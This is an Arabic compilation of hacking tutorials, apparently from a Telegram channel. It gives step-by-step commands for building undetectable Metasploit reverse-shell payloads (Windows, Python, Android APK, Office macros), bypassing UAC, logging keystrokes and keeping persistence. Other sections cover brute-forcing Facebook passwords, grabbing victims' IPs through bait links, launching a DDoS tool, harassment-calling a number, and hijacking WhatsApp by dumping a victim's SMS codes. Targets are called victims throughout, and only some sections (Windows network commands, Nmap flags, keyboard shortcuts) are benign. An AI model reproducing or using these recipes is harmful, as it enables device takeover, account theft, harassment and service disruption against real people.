‏اداة لتخطي مكافحات الفيروسات
الاداة قادرة على إنشاء FUD(او بالمعنى العربي كلين)
قابل للتنفيذ حتى مع اشهر بايلودات الميتاسبلويت

$ get clone https://github.com/oddcod3/Phantom-Evasion
$ sudo chmod +x phantom-evasion.py
$ sudo ./phantom-evasion.py

السلام عليكم ورحمة الله
شرحي اليوم مميز شوي هو عن أداة PhoneInfoga
و ظيفتها جلب معلومات عن رقم معين ....


أوامر تثبيتها


 
git clone https://github.com/sundowndev/PhoneInfoga

cd PhoneInfoga

python3 -m pip install -r requirements.txt


أوامر تشغيلها

python  phoneinfoga.py -n  2490000000000

بعد كتابه هذا الأمر يطلع لك الأوامر الأساسية للرقم





سأترك لكم بقيه الأوامر لاكتشافها
 
optional arguments:
  -h, --help            show this help message and exit
  -n number, --number number
                        The phone number to scan (E164 or international
                        format)
  -i input_file, --input input_file
                        Phone number list to scan (one per line)
  -o output_file, --output output_file
                        Output to save scan results
  -s scanner, --scanner scanner
                        The scanner to use
  --osint               Use OSINT reconnaissance
  -u, --update          Update the project
  --no-ansi             Disable colored output
  -v, --version         Show tool version






#CS

السلام عليكم ورحمة الله وبركاته
شرح اليوم عن جلب ip الضحيه عبر طرق مختلفه
هنالك أكثر من 5 طرق لجلب ip الضحيه سوف اشرح لكم طريقتين منهما

الطريقه الاولي عن طريق أداة T-HOST
 و الثانيه عن طريق أداة تصنعها بنفسك و هذي اضمن من أداة T-HOST


بسم الله نبدا


الطريقه الاولي   أداة T-HOST

أوامر تثبيتها


apt install git

git clone https://github.com/Bhai4You/T-Host

cd T-Host

chmod +x requirement.sh 127.0.0.1.sh

 bash requirement.sh
أوامر تشغيل الأداة



bash 127.0.0.1.sh


و بعدها راح يطلب منك اسم للصورة مثلا راح يكون

Cs.jpg

و بعدها راح يقول لك اعطي اسم للصفحة تبعك اختار اي اسم تريد
Cs

و بعدها راح يطلب حجم و عرض للصورة اختر الحجم المناسب لك


و بعدها راح تدخل ip تبعك و البورت المناسب انا اخترت 4444

و بعدها اضغط انتر و استني راح يطلع لكم رابط مثل هذا https://pactus.serveo.net
تقم بارساله للضحيه  من غير إغلاق أداة T-HOST

 بعد ما الضحيه يدخل عليه يتم جلب ip تبعه


 

#CS

السلام عليكم ورحمة الله وبركاته

الطريقه الثانيه ..
بسم الله نبدأ. ...

اولا راح نثبت الأمر php
pkg install php
اول خطوة راح نشي ملف داخل الهوم تبع termux ب اسم CS


mkdir CS
بعدها لو كتبت ls
راح يظهر لك ملف ب اسم CS مع الأدوات تبعك


ثانيا ....
راح ننشي ملف index بداخل ملف CS
اولا راح ندخل ملف CS عبر الأمر
cd CS
بعدها
nano index.html
راح يفتح لنا صفحه راح نكتب بداخلها وسم html


<html>
<head>
<title>مرحبا بكم في مجر الظلام </title>
</head>
<body bgcolor='blue'>
<center>
<img src='mama.jpg' width='100' height='100' />

</center>
<font color=red size='10px' face='tahoma'>
<h1> <p align='center'> <b>you are hacked by saja <br> </h1>
<font color=white size='10px' face='tahoma'>
<h3> <p align=center> مرحبا بكم في مجر الظلام </h3>
<h3>معكم <p align=center> CS<b> </h3>
</body>
</html>
بعدها نعمل حفظ



الحين راح نجلب الصورة تبعنا من ال  sdcard
اولا راح نضع الصورة مع الملفات mama.jpg

ونكتب
cd /sdcard
و بعدها
cp mama.jpg/$HOME/CS

كدا بقي عندنا صورة وملف html


كدا انا أنشأت index حقي

ح انقل أو نسخ  ملف CS كلو الي الذاكرة

mv CS /sdcard


لو فتحت الذاكرة الداخليه ح تلقي الملف اتنقل وبداخله
صورة و ملف html

نرجع termux

php -S  127.0.0.1:2340 -t /sdcard/CS
بظهر ليك رابط نسخ و أرسله للضحية







#CS

استغلال بعض ثغرات MetaSploit 💻

____________________________________________

أختراق Windows عن طريق Power Shell باستغلال ثغرة web_delivery

+) ماهو Power Shell ؟
هو عبارة عن أمر او مجموعة من الأوامر التنفيذية التي تكتب في cmd او ما يسمى موجه الأوامر " أمتداده يكون bat ويمكن تحويله إلى ملف بأمتداد exe "

+) أوامر الأستغلال ~>

$ msfstart
$ msfconsole
$ use exploit/multi/script/web_delivery
$ show targets
$ set target <Numper Target>
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ show option
$ exploit
$ session -i
$ session -i <Numper Session>

____________________________________________

تخطي UAC باستغلال ثغرة ASK

+) ماهو UAC ؟
هو عبارة عن صلاحيات الأدمن داخل جهاز الضحية

+) أوامر الأستغلال ~>

$ use exploit/windows/local/ask
$ set LHOST <ip>
$ set LPORT <port>
$ set session <numper session target>
$ set TECHNIQUE < PSH / EXE >
$ exploit
$ getsystem
$ run post/windows/gather/win_prives

____________________________________________

استغلال ثغرة s4u لتثبيت الضحية و حقن البايلود في جميع يوزر الضحية

+) أوامر الأستغلال ~>

$ use exploit/windows/local/s4u_persistence
$ set session <numper session target>
$ set TRIGGER <even,lock,logon,schedule,unlock>
$ set LPORT <port>
$ exploit

____________________________________________

اختراق الأجهزة بإستخدام سكربت بلغة الباثيون


+) صنع السكربت الملغم ~>

$ msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.py


+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload python/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit

_____________________________________________

اختراق الاندرويد عن طريق بايلود apk ملغم

+) صنع بايلود ملغم ~>

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.apk


+) الأستغلال ~>

$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit -x hide_app_icon

_____________________________________________
التنصت على لوحة مفاتيح الضحية

+) أوامر الأستغلال ~>

$ use post/windows/capture/keylog_recorder
$ set session <numper session target>
$ exploit

____________________________________________


نقل عملية الاختراق داخل proceess عند قتل البايلود

+) أوامر الأستغلال ~>

$ use payload/windows/meterprerter/reverse_tcp
$ show advanced
$ set prependmigrate true
$ set prependmigrateproc svchost.exe
$ set LHOST <ip>
$ set LPORT <port>
$ generate -t exe -f <path>
____________________________________________

تلغيم ملفات Microsoft Offic

+) أمر تلغيم ~>

$ mafvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f vba-exe

+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit
____________________________________________

تحميل سكريبت Fsociety
على Termux

المستخدم في مسلسل mr.robot
تحتوي على عده اقسام مهمه

#الاوامر

apt install git python2

git clone https://github.com/Manisso/fsociety

cd fsociety

bash <(wget -qO- https://git.io/vAtmB)

./install.sh

python2 fsociety.py

شرح اختراق الفيسبوك بالتخمين"
1⃣| apt update

2⃣| apt upgrade

3⃣| apt install python

4⃣| apt install python2

5⃣| apt install git

6⃣| git clone https://github.com/Gameye98/Lazymux.git

7⃣| ls

8⃣| cd Lazymux

9⃣| ls

🔟| chmod 777 lazymux.py

1⃣1⃣| python2 lazymux.py

اكتب رقم 3 وانتر وبعدين
اكتب 00 وانتر وبعدين
اكتب 4 وانتر وبعدين
اكتب 2 وانتر
من يخلص
اكتب
✔️ | ls
افتح نافذة جديدة
ملاحظة النافذة الجديدة تسحب الشاشة من جهت اليسار الى اليمين وبعدين اضغط على الكتابة الي ع اليمنة

واكتب
✔️ | ls

1⃣| cd facebook-brute

2⃣| ls

3⃣| chomd +x facebook.py

4⃣| python2 facebook.py


رح يطلب منك ايدي ID حساب الضحية تخلي
شلون اطلع الايدي تروح للصفحة الضحية اسوي نسخ رابط الضحية
وبعدين تجي تحطة بهذا الموقع وادوس ليكل ويب وتنزل لي جوا راح تلكة ارقام بل لون الاحمر سويلها نسخ وروح حطها بل برنامج ودوس انتر
بعدين يطلب منك موقع ملف الباسورد تخلي

-
5⃣| password.txt

☑️ | رح يبدأ التخمين موفقين 🔅

أسرع اداة على الأطلاق لأنشاء لستة باسوورد:-
$ apt update
$ apt upgrade
$ apt install git
$ apt install python
$ apt install python2
$ git clone https://github.com/UndeadSec/GoblinWordGenerator
$ cd GoblinWordGenerator
$ chmod +x *
لتشغيل الأداة فقط اكتب هذا الأمر👇
$ python3 goblin.py
شرح عن الأداة
بعدها رح يظهر لك هذه الاوامر
هنا يطلب منك ان تحدد عدد الأرقام او الأحرف
اذا اردت 6 ارقام او حروف مثلا تكتب 6:6 وهكذا.
[!] provide a size scale [eg: "1 to 8" = 1:8] :

أّلََّسلَأّمَ عٌلَيِّګمَ وِرحٌمَةّ أّلَلَهِ وِبِرګأّتّةّ الًيَوُمًِ معنا شرح تثبيت كل ادواة الكالي لينكس علـّۓ برنامج gnuroot وبرنامج VNC Viewer الشرح راح يكون بسبط باذن •اللّـہ̣̥ اول خطوه نقوم
تابعو معي اول خطوه
بفتح gnuroot ونقوم
بضغط على x term
وننتظر حتى يقوم التثبيت التلقائي وبعد مايخلص التثبيت
نقوم بكتابه الامر التالي
بعد التثبيت نكتب ه̷̷َـَْـُذآ الامر
تابع
الان راح يتثبت معك أذأ لم
apt-get update
وعند الانتها نكتب الامر الثاني الذي هوا
apt-get upgrade
وبعدها راح يوقف يطلع ڵـڱ. n/y اكتب حرف
y
واصل التثبيت حتى يخلص معك التثبيت في الامر المهم
apt-get install lxde
راح يثبت ويخذ وقت 30دقيقه أذأ كانت الشبكة لديك قويه يحمل ملفات وحد جيجا بايت
وبعد الانتهاء م̷ـــِْن التثبيت
نكتب الامر الاخير
apt-get update
أذأ تم التثبيت الاومر تابع معي
الان نروح VNC Viewer
الامر الثاني

نكتب 127.0.0.1:51
والاسم اي شي تريد
وكلمة السر هيا
gnuroot

الان فتح معانا وجهت لينكس تابع معي. الان نستطيع استخدام لينكس
وان شاءالله الشرح القادم راح يكون تثبيت جميع ادوات كااي لينكس وشكرا تحياتي لكم الشرعبي
في خطوه مهمة راح اشرحها قبل الاكتمال والي هنا ينتهي الشرح شكر ليـّۓ المتابعة الي لقاء في شرح ٱڅڑ


apt-get update
apt-get upgrade
apt-get install lxde
apt-get update
ثم تضغط على x term
ثم تفتح Vnc





127.0.0.1:51
gnuroot
الباسورد هم gnuroot
____________

فتح قائمة Staret ... ومنها Run ... كتابة الأمر CMD ... ضغط مفتاح Enter من لوحة المفاتيح

ستفتح لك قائمة CMD التى سيتم كتابة الأوامر بها
ipconfig

يستخدم هذا الأمر لمعرفة الـ IP و MASK و GATEWAY الخاصة بالجهاز الذى يتم كتابة هذا الأمر عليه .

و لو كتب الامر بالشكل التالى ipconfig /all ........... فسيتم معرفة ما سبق بالإضافة إلى الـ DSN و

MAC الخاصة الذى يتم كتابة هذا الأمر عليه .



GETMAC

يستخدم الأمر GETMAC للحصول على الـ MAC Address لكارت الشبكة الخاص
بالجهاز الذى ينفذ عليه هذا الأمر .


************@hackteep*********************

أمر Ping

يستخدم هذا الأمر للتأكد من عمل برووتوكول (TCP/IP) والذي يعني أن جهاز الكمبيوتر يرى

الشبكة حيث يقوم الأمر بإرسال 4 حزم من البيانات والتأكد من استقبالها في الطرفا لآخر للتأكد من

صلاحية استخدام جهازك للبروتوكول اكتب
Ping 127.0.0.1
للتأكد من رؤية أي جهاز آخر على الشبكة اكتب رقم الآى بى بتاع الجهاز اللى انت تريده
Ping ip address of the pc
مثال
pin 10.10.10.25

أى أنك تختبر الجهاز اللى رقمه 25


الامر nslookup

يقوم هذا الأمر بعرض عنوان السيرفر ورقم الأي بي

نتيجة تنفيذ الأمر لح تطلع
Default Server: هنا اسم الشركة

Address: هنا رقم الآبى الخاص بالشركة

*********@hackteep************************

لمعرفة الايبيهات الموجودة بالشبكة كلها


NETSTAT

START>>RUN>>COMMAND>>NETSTAT -N

هيطلع لك كل الايبيهات الي في الشبكه

وهذه معلومات عن هذا الامر

NETSTAT

NETSTAT حالة الشبكة يظهر جميع المنافذ المتصلة
NETSTAT مسافة-A يظهر ارقام الايبي المتصلة وحالتها
NETSTAT مسافة-E يظهر حالة الشبكة بشكل عام
NETSTAT مسافة-N يظهر ارقام البورتات والايبيات المتصلة
NETSTAT مسافة-P يظهر البروتوكولات المتصلة بجهازك
NETSTAT مسافة-R يظهر اجهزة الروترز في شبكتك
NETSTAT مسافة-S يظهر حالة الشبكة والاجهزة المتصلة


**********@hackteep*********************
telnet

وهو أمر يستخدم للدخول والتحكم عن بعدremote access
ويستخدم للدخول على الروتر بكتابه الأمر وبجواره ألأيبى الخاص بالروتر
هكذا telnet 192.168.2.1
وحيظهرلكloginتكتب أسم ألأدمن
وبعدها حيظهر الpasswordبكتابة صحيح سوف تستطيع التحكم فى الروتر عن بعد
2/arp
وهذا الأمر تكتبه للحصول على كل الأيبهات والماك أدرس اللى موجودة على الشبكة ويكتب على الشكل التالى
arp -a
وكمانarp -g
وكمان بيظهروا حالة أتصال ألأجهزة بالروتر أذا كانت دينمك ولا استاتيك
ولو عايز تعمل دليت لهوست عندك على الشبكة تكتب الأمر
arp -d
ولو عايز تضيف هوست على الشبكة تكتب ألأمر
arp -s 192.168.2.205 00-1h-4d-db-5r-4g
أول رقم الايبي الخاص بالجهاز
والتانى الماك أدرس

أداة Nmap وكيفية استخدامها في فحص الشبكات

من أشهر أدوات فحص الشبكات وأكثرها استخدما من قبل الهكر طبعا انأ بتوقع انوا الأداة ما وجدت خصيصا شانهم على كل حال هذه الأداة مفتحة المصدر و سهلة الاستخدام وجيدة جدا لفحص واستقصاء بعض المعلومات الأخرى عن الأجهزة الموجودة في الشبكة وألان سوف ندخل بالشرح مباشرة من دون لف ودوران ههههههههه

أولا انا سوف اشرح استخدام الأداة على الوندوز وليس لينكس ولكن كل الأوامر الذي سوف أنفذها تصلح لكلا النظامين لان المبدأ واحد:

اول شي امر –sP

هذا الامر متل امر البنج تمام بل هو بنفس

D:\nmap-5.51>nmap –sP 192.168.1.102
ويكون التانج كالتالي وانظر كيف حدد لنا الجهاز ايضا كم انت كبير يانيماب

Nmap scan report for 192.168.1.102

Host is up (0.00s latency).

MAC Address: 00:1A:92:8B:77:A7 (Asustek Computer)
وتاني شيئ هو الأمر –sT وهو لفحص المنافذ حيث سوف يقوم بفحص الف بورت ويخبرك انا كان مفتوحا او مفلتر:

D:\nmap-5.51>nmap –sT 192.168.1.101

Nmap scan report for 192.168.1.101

Host is up (0.00s latency).

Not shown: 999 filtered ports

PORT STATE SERVICE

21/tcp open ftp

MAC Address: 00:1A:92:8B:77:A7 (Asustek Computer)
انظر كيف كشف لنا ان البورت 21 مفتوح وهكذا بتحسن بتشغل الميتاسبلويت وتستغل البورت الشغل بشي ثغرة

اما الامر –sS فهوا يبعت Packet من نوع Syn

D:\nmap-5.51>nmap –sS 192.168.1.101

Nmap scan report for 192.168.1.101

Host is up (0.00s latency).

All 1000 scanned ports on 192.168.1.101 are filtered

MAC Address: 00:1A:92:8B:77:A7 (Asustek Computer)
انظر كيف ان جميع البورتات مفلتر…….

امر –sU يبعت Packet من نوع UDP

D:\nmap-5.51>nmap –sU 192.168.1.101

Nmap scan report for 192.168.1.101

Host is up (0.00s latency).

All 1000 scanned ports on 192.168.1.101 are open|filtered

MAC Address: 00:1A:92:8B:77:A7 (Asustek Computer)
امر –sA هاد الامر يرسل Packet من نوع ACK ولكن هذا الامر فقط يقول لنا اذا المنفذ مفلتر ولا لا

D:\nmap-5.51>nmap –sA 192.168.1.102

Nmap scan report for 192.168.1.102

Host is up (0.00s latency).

All 1000 scanned ports on 192.168.1.102 are filtered

MAC Address: 6C:F0:49:B4:36:8D (Giga-byte Technology Co.)
انظر كيف ظهرت فقط الفلترة ولا يقول شي على انه مفتوح او مغلق

امر –sO IP Protocol Scan

D:\nmap-5.51>nmap –sO 192.168.1.102

Nmap scan report for 192.168.1.102

Host is up (0.015s latency).

All 256 scanned ports on 192.168.1.102 are open|filtered

MAC Address: 6C:F0:49:B4:36:8D (Giga-byte Technology Co.)
امر –sV وهذا الامر يكشف لنا الخدمات الشغالة واصدراتها ان اتسطاع الان انتقلنا الى المتعة في النيم ماب

D:\nmap-5.51>nmap –sO 192.168.1.102

Nmap scan report for 192.168.1.102

Host is up (0.00s latency).

All 1000 scanned ports on 192.168.1.102 are filtered

MAC Address: 6C:F0:49:B4:36:8D (Giga-byte Technology Co.)
لكن يبدوا انه لايوجد حاليا بورت مفتوح في الاجهزة الموصولة معي بالشبكة على كل حال هذه هيا الطريقة

واما اذا اردنا الفحص السريع لاي بي فاننا نضع –F الذي تفحص فقط اشهر المنافذ

D:\nmap-5.51>nmap –sT -F 192.168.1.102

Host is up (0.0051s latency).

Not shown: 99 filtered ports

PORT STATE SERVICE

21/tcp open ftp

MAC Address: 6C:F0:49:B4:36:8D (Giga-byte Technology Co.)
امر –O لمعرف النظام

وامر –e لتحديد نوع الشبكة (wlan – eth0)interface يعني لو كان عنا شبكتين وحدة وايرس وتانية محلية وبهذه الطريقة نحدد نوع الشبكة اولاُ ثم بعدها نفحص

اما الامر –A فهو يجمع كل المعلومات من النظام وتحديد الاصدارات وفحص السكربتات ……..

D:\nmap-5.51>nmap –sU -A 192.168.1.102
واذا اردنا ان نحدد منفذ او منفذين فقط نستخدم –p 80,8080 وهكذا اما اذا اردنا مثلا انا نفحص المنافذ من 10 الى 100 نستخدم –p 10-100

D:\nmap-5.51>nmap –sS –p 80,8080 192.168.1.102

D:\nmap-5.51>nmap –sS –p 10-100 192.168.1.102
-v لرؤية عملية الفحص

-oN لحفظ النتائج على مستند نصي

D:\nmap-5.51>nmap –sS –p 80,8080 –v –oN log.txt 192.168.1.102
طبعا كن حذرا لانك يمكن اتنكشف وانت تفحص المنافذ من قبل صاحب الموقع او السيرفر

لذلك هنالك طريقة لتقسيم Packet مما يصعب من كشفك اما اذا اردت امر تتوه فيه السيرفر مالك غير:-D

D:\nmap-5.51>nmap -SS -D 192.168.1.102 192.168.1.103 192.168.1.104
هذا سوف يتوه صاحب السيرفر ويجعله يتوه عن الايبي الذي قام بالفحص وينسى الامر…

المصدر @hackteep

30 أمر من قائمة التشغيل Run

1- الامر winipcfg

لمعرفة الـIP الخاص بك

2- الأمر regedit

لفتح شاشة الريجستري للويندوز

3- الأمر msconfig

أداة مساعدة ومنها يمكن إيقاف تشغيل اي برنامج

4- الأمر calc

لفتح الآلة الحاسبة

5- الأمر command

لفتح نافذة الدوس

6- الأمر scandisk او scandskw

لعمل فحص للقرص

7- الأمر taskman

لمشاهدة كل شي مفتوح في شريط المهام والتحكم فيه

8- الأمر temp

للوصول لملفات الإنترنت المؤقتة

9- الأمر dxdiag

لمعرفة كل مواصفات جهازك ومعلوماته

10- الأمر pbrush

لتشغيل برنامج الرسام

11- الأمر cdplayer

لتشغيل برنامج السي دي بلاير

12- الأمر progman

لفتح الـProgram Manager

13- الأمر tuneup

لتشغيل معالج الصيانة للجهاز

14- الأمر debug

لمعرفة نوع كرت الشاشة

15- الأمر hwinfo /ui

معلومات عن جهازك وفحصه وعيوبه والتقرير عنه

16- الأمر sysedit

لفتح الـSystem Editor

( محرر تكوين النظام )

17- الأمر packager

لإستعراض برنامج تغيير الايقونات

18- الأمر cleanmgr

لتشغيل برنامج التنظيف

19- الأمر msiexec

معلومات عن حقوق البرنامج والشركة

20- الأمر imgstart

لتشغيل إسطوانة الويندوز

21- الأمر sfc

لإرجاع ملفات الـdll

22- الأمر icwscrpt

لنسخ ملفات الـdll

23- الأمر recent

لإستعراض الملفات التي تم تشغيلها من قبل

24- الأمر mobsync

لفتح برنامج مهم جدا لتنزيل صفحات الإنترنت وتصفحها في الخارج فيما بعد

25- الأمر Tips.txt

ملف مهم يحتوي على اسرار للويندوز

26- الأمر drwatson

لفتح برنامج دكتور واطسون لعمل فحص شامل على جهازك

27- الأمر mkcompat

لتغيير خصائص البرامج

28- الأمر cliconfg

للمساعدة في شبكة الاتصال

29- الأمر ftp

لفتح الـFile Transfer Protocol

(بروتوكول نقل الملفات)

30- الأمر telnet

تابع للينكس

وتم إدخاله على الويندوز

للإتصال بالسيرفرات وخدمات الشبكة

check url = كشف عناوين url الشريرة التي تستخدم IDN Homograph Attack.
التركيب :
$ apt && apt update
$ apt install git
$ apt تثبيت python2
$ apt تثبيت بيثون
git clone https://github.com/UndeadSec/checkURL
$ cd checkurl
$ chmod + x *
الاستخدام:
الآن تشغيل مع python3 اكتب هذا الأمر:
$ python3 checkURL.py - مساعدة
هذا يظهر جميع الخيارات ..
$ python3 checkURL.py --url [attackerurl]
المهاجم url = المهاجم url tom check this is idn evil url or url original

Credmap هي أداة مفتوحة المصدر تم إنشاؤها لـ
جلب الوعي لمخاطر إعادة استخدام أوراق الاعتماد.
إنه قادر على اختبار بيانات اعتماد المستخدم الموردة
على العديد من المواقع المعروفة لاختبار إذا كانت كلمة المرور
وقد تم إعادة استخدامها على أي من هذه
التركيب :
$ apt && apt update
$ apt install git
$ apt تثبيت python2
$ apt تثبيت بيثون
git clone https://github.com/lightos/credmap
مؤتمر نزع السلاح دولار
$ chmod + x *
الاستخدام:
$ $ python2 credmap.py -h
يعرض جميع الخيارات لاستخدام هذه الأداة
$ python2 credmap.py - اسم المستخدم king --email king56@email.com
king = اسم مستخدم البريد الإلكتروني
king56@email.com =

اداة اتصال مزعجة

$ apt update


$ apt upgrade

$ apt install termux-api
call process :

$ termux-telephony-call
9999999999
9999999999 = number of victem

اداة تقوم بأستخراج متاحات وفحصها

#الاوامر

- git clone https://github.com/wahyuandhika/YahooCloning


- cd YahooCloning/
- chmod +x cloning.py
- pip2 install requests

- pip2 install mechanize

- python2 cloning.py

الان اكتبي الـايميل تبع حسابك الفيسبوك وانتر وبعدين حطي الرمز وانتر ورح يستخرج الايميلات
بيطلعين باللون الاحمر والاخظر الاخظر يكون متاح

اداة تقوم بأستخراج متاحات وفحصها

#الاوامر

- git clone https://github.com/wahyuandhika/YahooCloning


- cd YahooCloning/
- chmod +x cloning.py
- pip2 install requests

- pip2 install mechanize

- python2 cloning.py

الان اكتبي الـايميل تبع حسابك الفيسبوك وانتر وبعدين حطي الرمز وانتر ورح يستخرج الايميلات
بيطلعين باللون الاحمر والاخظر الاخظر يكون متاح

🖥🔴 أسرار الكمبيوتر🔴💻

⌨للفائدة👇
أسرار الكيبورد نصيحة اعمل مشاركة للمنشور واحتفظ بنسخة على حسابك ولكى تستطيع ان ترجع الى اى اختصار فى اى وقت
تعلم كتابة الكسرة والفتحة والضمة وأسرار الكيبورد

ذ + ​Shift : الشدة​
Shift + Q : الفتحة
Shift + W : تنوين فتح
Shift + A : الكسرة
Shift + S : تنوين كسرة
Shift + E : الضمة
Shift + R : تنوين ضم
Shift + X : السكون
Shift + Z : المدة
Shift + T : لإ
Shift + G : لأ
Shift + Y : إ
Shift + H : أ
Shift + N : آ
Shift + B : لآ
Shift + V : {
Shift + C : }
Shift + F : ]
Shift + D : [
Shift + J : تمديد الحرف
Ctrl + C : نسخ
Ctrl + X : قص
Ctrl + V : لصق
Ctrl + Z : تراجع
Ctrl + A : تعليم الملف
Shift + U : فاصلة معكوسة
Ctrl + ESC : قائمة المهام
Ctrl + Enter : ابتداء صفحة جديدة
Ctrl + Shift : لغة عربية ( يمين )
Ctrl + Shift : لغة إنجليزية ( يسار )
Ctrl + 1 : مسافة مفردة
Ctrl + 5 : مسافة سطر ونصف
Ctrl + 2 : مسافة مزدوجة
Ctrl + G : الانتقال إلى صفحة
Ctrl + END : الانتقال إلى نهاية الملف
Ctrl + F5 : تصغير نافذة الملف
Ctrl + F6 : الانتقال من ملف لأخر
Ctrl + F2 : معاينة الصفحة قبل الطباعة
= + Ctrl : تكبير وتصغير درجة واحدة
F4 : تكرار أخر عملية
Alt + Enter : تكرار أخر عملية
Ctrl + Y : تكرار أخر عملية
Ctrl + F9 : فتح قوسين جاهزين
Shift + F10 : تعداد نقطي ورقمي
F12 : حفظ بأسم
Shift + F12 : حفظ الملف
Ctrl + Home : أول المستند
Ctrl + End : أخر المستند
Shift + F1 : معلومات عن نوع التنسيق
Ctrl + U : سطر تحت النص
Ctrl + F4 : خروج من الملف
Ctrl + N : ملف جديد
Ctrl + H : استبدال
Ctrl + I : خط مائل
Ctrl + K : تنسيق المستند
Ctrl + P : طباعة
Ctrl + O : فتح منطقة
د + Ctrl : تكبير النص
ج + Ctrl : تصغير النص
Alt + S : قائمة تنسيق
Alt + J : قائمة تعليمات
[ + Alt : قائمة جدول
] + Alt : قائمة أدوات
Alt + U : قائمة عرض
Alt + P : قائمة تحرير
Alt + L : قائمة ملف
“ + Alt : قائمة إطار
Alt + Q : تعديل مسطرة
Ctrl + E : توسيط النص
Ctrl + F : بحث
Ctrl + B : خط أسود
Ctrl+Shift + P : حجم الخط
Ctrl+Shift + S : نمط
Ctrl + D : خط
Ctrl+Shift + K : تحويل الحروف - Capital
Shift + F3 : تحويل الحروف - Capital
Ctrl+Shift + L : وضع نقطة عند بداية النص
Ctrl+Alt + E : حواشي سفلية ترقيم روماني
Ctrl+Alt + R : وضع علامة ®
Ctrl+Alt + T : وضع علامة ™
Ctrl+Alt + C : وضع علامة ©
Ctrl+Alt + I : معاينة الصفحة قبل الطباعة
Shift + F7 : قاموس المرادفات
Ctrl+Alt + F1 : معلومات النظام
Ctrl+Alt + F2 : فتح الدلائل
Ctrl + J : تسوية النص من الجانبين
Ctrl + L : بداية النص من الجانب الأيسر
Ctrl + Q : بداية النص من الجانب الأيمن
Ctrl + E : توسيط النص
Ctrl + M : تغيير المقاس الأعلى للفقرة
Shift + F5 : رجوع إلى الموضع الذي انتهيت منه عند إغلاق الملف
= + Ctrl + Alt : تخصيص
F3 : إدخال نص تلقائي
F9 : تدقيق حقول
F10 : تحريك إطار لفتح النوافذ
F1 : تعليمات
F5 : الانتقال إلى
F7 : تدقيق إملائي
F8 : تعليم منطقة
ctrl+a
يعمل هذا الامر بتحديد الكل للنصاو الكائن
ctrl+c
يعمل هذا الامر بنسخ الذي تم تحديده
ctrl+v يعمل هذا الامر بلصق المنسوخ
ctrl+x يعمل هذا الامر بقص الذي تم تحديدة
ctrl+z هذا الامر مهم جذا يمكنك التراجع

اداة هجوم على مواقع اختصار لخمس ادوات
توفر الوقت والجهد
اول شي حمل الاداة من هذا الرابط

https://www.mediafire.com/download/gyjzpmbad11gsln

بعد تحميلها ادخل لـ termux وحط هذي الاوامر

termux-setup-storage

الان ندخل الى مسار الاداة بتتنزل بمجلد الـ Download

cd /sdcard/Download

الان ننقل الاداة الى termux

mv DDOS.zip $HOME

الان نفك الضغط على الاداة

unzip DDOS.zip

الان ندخل لملفات الاداة

cd DDOS

الان نعطي الصلاحيات للملفات

chmod +x *

الان نشغل هذا الملف اولا مهم جدا قبل تشغيل الاداة

./install.sh

بعد تكمله التحميل حط هذا الامر للتشغيل

./ddos.sh 999999

نحط مكان الـ 99999 ip الموقع الذي تريد الهجوم عليه
والان رح تشتغل الاداة وتطلع لك خمسه اختيارات كل اختيار فيه اداة حط رقم الاداة اللي بدك تهجم منها ورح تبدء تهجم الاداة من نفسها

شرح اختراق الأجهزة والواتساب من اداة Merasploit (الشرح يطبق على termux)


الخطوة الاولى تثبيت metasploit
ان كنت مثبتها من قبل لا داعي لكتابة هذه الاوامر

#الاوامر
pkg install unstable-repo

pkg install metasploit

msfconsole

الأن سوف تعمل الاداة بدون مشاكل

---------------------------------------------------------------


الخطوة الثانية

تثبيت اداه ngrok لفتح البورتات

الاوامر

اولاً سوف تسجل في هاذا الموقع↓
www.ngrok.com
بعد التسجيل في الموقع سوف تجد كلمة linux arm اضغط عليها سوف يتم تحميل ملف ngrok (ملف مظغوط) سوف تنقله للذاكرة الداخليه

بعدها انزل قليلاً الى اسفل موقع ngtok ستجد رقم 3 رابط او كود مثل هذا ↓
./ngrok authtokenyrifjgbhdjgnbvjgcbn_gfvhfhvcbgf

احتفظ به لأنك سوف تستخدمه داخل termux

الأن قم بالدخول الى termux واكتب الأوامر التالية

→ apt update && apt upgrade

→ cd /sdcard

→ ls

→ mv ngrok-stable-linux-arm.zip $HOME

→ cd

→ ls

→ unzip ngrok-stable-linux-arm.zip

→ rm -rif ngrok-stable-linux-arm.zip

→ ls

←الان سوف تضع الرابط الذي حصلت عليه من موقع ngrok

بعدها قم بكتابة امر تشغيل الأداة

./ngrok tcp 4444

★الان سوف تعمل معك الاداة دون مشاكل


★********************************★


الخطوة الثالثة


اغلق جميع النوافذ

افتح نافذة جديدة

←افتح اداه ngrok ↓
ls

./ngrok tcp 4444

←الان سوف تفتح نافذة جديدة وتكتب اوامر صنع بايلود لاختراق الضحيه↓


اوامر صنع بايلود لاختراق الضحيه ↓

msfvenom -p android/meterpreter/reverse_tcp LHOST=❌❌ LPORT=4444 R > /sdcard/termux.apk

بدلا من ❌❌ اكتب الip الخارجي الخاص بجهازك


لمعرفة الip الخارجي الخاص بك افتح نافذه جديده واكتب امر ifconfig وسوف يظهر لك الip

والان انتظر الى ان ينتهي من صناعة البايلود وعندما ينتهي سوف تجد البايلود في الذاكره الداخليه خارج مع الملفات بأسم termux ارسله للضحيه الذي تريد ان تقوم بإختراقه
عندما تقوم الضحية بتثبيت البايلود

استخدم الأوامر التالية

→ msfconsole
امر فتح اداة metasploit بعد ان تفتح الاداة اكتب الاوامر ↓↓

→ use exploit/multi/handler

→ set payload android/meterpreter/reverse_tcp

→ set lhost

→ set lport هنا البورت الي فتحته بأداة نجروك

→ exploit


الأن سوف تقوم بتنزيل نسخة واتساب جديدة ووصع رقم الضحية بها وعند وضع رقم الضحية اضغط انتر ok

الأن سنقوم بإختراق رسائل SMS الخاصة بهاتف الضحية لكي نقوم بالحصول على كود تأكيد الدخول لواتساب (الكود مكون من 6 خانات )

امر اختراق رسائل الضحية
→ dump_sms

